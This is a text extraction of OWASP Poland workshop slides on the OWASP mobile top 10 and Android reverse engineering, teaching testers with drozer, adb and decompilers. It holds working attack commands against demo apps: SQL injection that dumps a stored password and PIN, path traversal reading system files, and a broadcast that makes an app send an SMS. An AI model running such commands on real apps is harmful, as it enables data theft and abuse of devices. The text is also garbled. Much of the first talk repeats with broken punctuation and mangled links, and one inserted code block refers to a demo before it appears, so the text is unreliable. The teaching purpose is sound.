• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic - feel free to interrupt me :)
What are we going to talk about...
Before we start... the threat model
M2 - Insecure data storage
Insecure data storage - what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure format (plain text or reversible encoding)
Insecure data storage - what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage - how to find
• Install and run the application for some time
• Monitor changes in the sdcard before and after installing the application
• Analyze package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage - real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection - what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications - chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
if (presented_cert == pinned_cert)
    Start_connection();
else
    Drop_connection();
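The pseudocode above carried through as public-key pinning on top of HttpsURLConnection, written as an added example for this workshop (not code from the slides or any library): the platform's chain-of-trust check still runs during the handshake, and on top of it the SHA-256 of the leaf certificate's public key must equal one of the pins embedded in the app. The pin values are placeholders; the class and method names are this example's own.

```java
import java.io.IOException;
import java.net.URL;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.Certificate;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLPeerUnverifiedException;
import android.util.Base64;

/**
 * Public-key pinning for HttpsURLConnection. Pinning the key (not the whole certificate)
 * keeps working across routine certificate renewals as long as the server keeps its key pair;
 * a second pin for a backup key avoids locking the app out when the key is rotated.
 */
public final class PinnedConnection {
    // Base64(SHA-256(SubjectPublicKeyInfo DER)) of the server keys. PLACEHOLDER values:
    // compute the real ones from the server certificate (and a backup key) before shipping.
    private static final String[] PINS = {
            "sha256/PLACEHOLDER_PRIMARY_KEY_PIN=",
            "sha256/PLACEHOLDER_BACKUP_KEY_PIN="
    };

    /** Pin string for a DER-encoded SubjectPublicKeyInfo, in the "sha256/<base64>" form. */
    static String pinOf(byte[] spkiDer) throws NoSuchAlgorithmException {
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(spkiDer);
        return "sha256/" + Base64.encodeToString(digest, Base64.NO_WRAP);
    }

    /** The decision from the slide: the presented key matches a pin, or the connection is dropped. */
    static boolean matchesAnyPin(Certificate leaf, String[] pins) throws NoSuchAlgorithmException {
        String presented = pinOf(leaf.getPublicKey().getEncoded()); // getEncoded() is the SPKI DER
        for (String pin : pins) {
            if (pin.equals(presented)) {
                return true;
            }
        }
        return false;
    }

    /**
     * Opens the connection, completes the TLS handshake (where the normal chain validation
     * happens) and checks the pin before any response is consumed. To stop even the request
     * headers from leaving the device on a mismatch, move the same comparison into a custom
     * X509TrustManager instead of checking after connect().
     */
    public static HttpsURLConnection open(URL url) throws IOException, NoSuchAlgorithmException {
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        conn.connect();
        Certificate[] chain = conn.getServerCertificates(); // chain[0] is the leaf certificate
        if (chain.length == 0 || !matchesAnyPin(chain[0], PINS)) {
            conn.disconnect();                                 // Drop_connection()
            throw new SSLPeerUnverifiedException("server key does not match any pinned key");
        }
        return conn;                                           // Start_connection()
    }
}
```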
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and...
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened...
More: httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or httpswwwssllabscomssltest for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: httpswwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage - what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about a developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage - common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage - how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication - what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then... your app has poor authorization and/or authentication
Poor Authorization and Authentication - how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication - real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: httpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember to...
• ...stay reasonable when you're going to follow advice from the Internet...
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography - what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it...):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography - how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea...
Broken Cryptography - example
• ...but not when you're hardcoding the password to decrypt it in the code...
Broken Cryptography - real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection - what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection - what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy - the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent capture = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection - how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection - real example
• The UniversalMDMClient (a built-in application of Samsung KNOX - a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
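The local-db SQL injection from the sieve demo earlier (projection "* FROM Key;--", selection "'") happens when a provider's query() pastes caller-controlled strings into SQL. The provider below is an added example for this section, not sieve's or drozer's code, and shows the unsafe shape next to a hardened query() built on SQLiteQueryBuilder's projection map and strict mode. Authority, table and column names are placeholders.

```java
package org.example.hardened; // placeholder package, not sieve's

import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.UriMatcher;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import java.util.HashMap;
import java.util.Map;

/**
 * Content provider whose query() refuses the two injections from the sieve demo:
 *  --projection "* FROM Key;--"  -> not a key of the projection map -> IllegalArgumentException
 *  --selection  "'"              -> strict mode parses the selection as a WHERE clause first
 * On top of this, declare the provider in the manifest with android:exported="false" or an
 * android:permission so that only intended callers reach it at all.
 */
public class HardenedProvider extends ContentProvider {
    static final String AUTHORITY = "org.example.hardened.provider";   // placeholder authority
    private static final String TABLE_PASSWORDS = "Passwords";
    private static final int CODE_PASSWORDS = 1;
    private static final UriMatcher MATCHER = new UriMatcher(UriMatcher.NO_MATCH);
    // Whitelist of what a caller may SELECT; the password column is deliberately absent.
    private static final Map<String, String> PASSWORD_COLUMNS = new HashMap<>();

    static {
        MATCHER.addURI(AUTHORITY, "Passwords", CODE_PASSWORDS);
        PASSWORD_COLUMNS.put("_id", "_id");
        PASSWORD_COLUMNS.put("service", "service");
        PASSWORD_COLUMNS.put("username", "username");
    }

    private SQLiteDatabase db;

    @Override
    public boolean onCreate() {
        // Open or create the database here (SQLiteOpenHelper boilerplate omitted).
        return true;
    }

    /** VULNERABLE shape, for contrast: caller-controlled projection and selection go straight into SQL. */
    Cursor queryUnsafe(String[] projection, String selection) {
        return db.query(TABLE_PASSWORDS, projection, selection, null, null, null, null);
    }

    /** HARDENED: strict query builder with a projection map and bound selection arguments. */
    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        if (MATCHER.match(uri) != CODE_PASSWORDS) {
            throw new IllegalArgumentException("Unknown URI " + uri);
        }
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables(TABLE_PASSWORDS);
        // Every projection entry must be a map key; without strict mode the builder would still
        // let an entry containing " AS " through verbatim, so strict mode closes that path too.
        qb.setProjectionMap(PASSWORD_COLUMNS);
        qb.setStrict(true);
        // selectionArgs are bound as parameters, never concatenated into the statement.
        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    // Writes are closed off: the provider is read-only, so data cannot be altered via
    // app.provider.insert / update / delete either.
    @Override public String getType(Uri uri) {
        return "vnd.android.cursor.dir/vnd." + AUTHORITY + ".passwords";
    }
    @Override public Uri insert(Uri uri, ContentValues values) {
        throw new UnsupportedOperationException("read-only provider");
    }
    @Override public int delete(Uri uri, String selection, String[] selectionArgs) {
        throw new UnsupportedOperationException("read-only provider");
    }
    @Override public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
        throw new UnsupportedOperationException("read-only provider");
    }
}
```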
M9 - Improper session handling
Improper session handling - what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling - how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
  – a session expires (copy a cookie and try to use it after 30 minutes)
  – a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling - few facts from reality
• What we know is that "sessions have to expire"...
• ...but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts... 71.56 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepaoutlookcom
References
• httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• httpsgithubcomikusthello-pinnedcerts
• httpwwwexploresecuritycomtesting-for-cipher-suite-preference
• httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• httpwwwslidesharenetJackManninoowasp-top-10-mobile-risks
• httpsmanifestsecuritycomandroid-application-security
• httpsmobilesecuritywikicom
• httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtml
• httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=ampid=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2
• httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testing
• httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
• httpswwwssllabscomssltest
• httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-step
• httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• httpsgithubcomlinkedinqark
• httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtml
• httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• httpthehackernewscom201405microsoft-outlook-app-for-androidhtml
• httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APK Optic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling - high level - Java code
• Disassembling - low level - assembly code
• Why disassembling and not decompiling?
Decompiling
DEX -> JAR -> JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows using any existing Java decompiler with the resulting JAR file
Decompiling - Java decompilers
• JD-GUI || Luyten
  – Closed source Java decompilers
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX -> SMALI
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling - Luyten
Demo: Modify Smali files
Demo
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
– another application, via an intent/content provider
– a shared file
– a server response
– a third-party website
Client side injection – what to inject
• SQL injection into the local DB
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity etc.) via special objects called Intents:
Intent viewIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent captureIntent = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows for remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– verify if a session expires (copy a cookie and try to use it after 30 minutes)
– verify if a session is destroyed after the authentication state changes (e.g. switching from any logged-in user to another logged-in user)
– verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
